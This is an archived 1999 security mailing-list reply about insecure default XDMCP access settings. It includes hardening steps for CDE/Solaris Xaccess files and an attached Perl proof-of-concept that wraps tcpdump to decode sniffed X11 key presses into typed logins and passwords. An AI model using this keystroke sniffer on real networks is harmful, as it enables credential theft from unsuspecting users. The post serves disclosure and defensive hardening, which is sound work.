On Wed, Aug 18, 1999 at 12:26:20PM +0200, Jochen Bauer wrote:
> On Wed, 26 Nov 1997 Eric Augustus ([EMAIL PROTECTED]) posted a message
> on BUGTRAQ about the fact, that the default Xaccess file allows XDMCP
> connections from any host. As you know, this can be used to get a
> login screen on any host and therefore get around access control
> mechanisms like tcpwrapper and root login restriction to the console.
>
> However, this warning seemed to have little effect as (at least)
> Digital Unix 4.0E, SuSE Linux 6.1 and Red Hat Linux 6.0 are still
> (1.5 years later) shipped with this default Xaccess file.
<snip>
and with CDE on our Solaris 2.6 machines as well. (I haven't checked
CDE under 2.7 yet.)
I agree that this reminder about locking-down X login is justified...
Sys admins who shut-out clear text-based logins (such as telnet) in
favor of ssh, for instace, should also be limiting X logins as well,
since it's nearly as easy to sniff and decode the raw X events to
derive the clear-text logins and passwords.
See the attached "proof of concept" script that I used to demonstrate
this to admins who were under the impression that X-based logins were
somehow secure from login/password sniffing. It's a quick hack but
worked with an XFree86 server logging in via Solaris 2.6 dtlogin. YMMV.
(I.e. please don't tell me that it doesn't work - it was written for
one-time use... the X KeyCodes in the script can be modified for your
target X server.) The script arguments are just passed allong to
tcpdump, so usage is something like:
$ xtcptrace src xterminal and dst loginhost
Secondly, for CDE environments such as Solaris, which use an xdm-derived
model, here's a bit of detail about how folks can restrict X login access:
1) If "/etc/dt/config/Xaccess" doesn't exist, copy it from "/usr/dt/config".
Comment-out this line (as show here) of "/etc/dt/config/Xacccess":
#* CHOOSER BROADCAST #any indirect host can get a chooser
Then you can add specific X servers by hostname or IP address at the
end of the "Xaccess" file.
2) send SIGHUP to the *parent* dtlogin daemon process.
For further details see the section labeled "The Xaccess File" in the
dtlogin(1) man page.
Dave
--
[EMAIL PROTECTED] http://net.doit.wisc.edu/~plonka ARS:N9HZF Madison, WI
#! /usr/local/bin/perl
# xtcptrace - a tcpdump "wrapper" to decode X KeyCodes
# Dave Plonka <[EMAIL PROTECTED]>, Aug 27 1998
$tcpdump='/path/to/tcpdump';
if (! -x ${tcpdump}) {
print STDERR "You don't seem to have execute permission on \"${tcpdump}\".\n";
exit 1
}
# X KeyCodes... These can be determined using xkeycaps(1), for example.
# I assume these are well documented somewhere.
# Remember we're watching key presses here, not the resulting X KeySym or
# ASCII character. So a '[SHIFT]' preceeding an 'A' is probably a capital
# letter A, etc.
%code = (
0x0A => '1', 0x0B => '2', 0x0C => '3', 0x0D => '4',
0x0E => '5', 0x0F => '6', 0x10 => '7', 0x11 => '8',
0x12 => '9', 0x13 => '0', 0x26 => 'A', 0x38 => 'B',
0x36 => 'C', 0x28 => 'D', 0x1A => 'E', 0x29 => 'F',
0x2A => 'G', 0x2B => 'H', 0x1F => 'I', 0x2C => 'J',
0x2D => 'K', 0x2E => 'L', 0x3A => 'M', 0x39 => 'N',
0x20 => 'O', 0x21 => 'P', 0x18 => 'Q', 0x1B => 'R',
0x27 => 'S', 0x1C => 'T', 0x1E => 'U', 0x37 => 'V',
0x19 => 'W', 0x35 => 'X', 0x1D => 'Y', 0x34 => 'Z',
0x40 => '[ALT]', 0x41 => ' ', 0x42 => '[CAPS LOCK]', 0x32 => '[SHIFT]',
0x24 => '[RETURN]', 0x16 => '[BACK SPACE]',
);
open(STDIN, "${tcpdump} -l -x -s 65535 -v @ARGV|") || die;
select(STDIN); $| = 1;
select(STDOUT); $| = 1;
while (<STDIN>) {
# This is a total kludge below - we only look at 32 byte packets since
# that is the size of an xEvent. However, we may miss some events because
# they can be grouped together in one packet. So really, any multiple of
# 32 (e.g. 64, 96) could also contain xEvents.
if (m/^\d\d:\d\d:\d\d\.\d+\s+.*\.6000\s+>\s+.*\(32\)/) {
scalar(<STDIN>); # discard
scalar(<STDIN>); # discard
$_ = scalar(<STDIN>);
# Another kludge - the magic numbers in the line below (0x5018, 0x7d78,
# etc.) were discovered by watching xEvents with tcpdump(1). I don't
# know that they'll have those values from all X servers or what.
# Probably, the xEvent typedef struct, as defined in <X11/Xproto.h>,
# should be grokked to implement this correctly.
# The Right Thing(tm) would probably be to pack the packet content as
# a 32-byte scalar, then unpack it into it's appropriate structure
# members.
if
(m/5018\s+7d78\s+[0-9a-f][0-9a-f][0-9a-f][0-9a-f]\s+0000\s+03([0-9a-f][0-9a-f])/) {
if ($c = $code{hex($1)}) {
print "$c\n"
} else {
print "KeyCode 0x$1\n"
}
}
}
}
exit
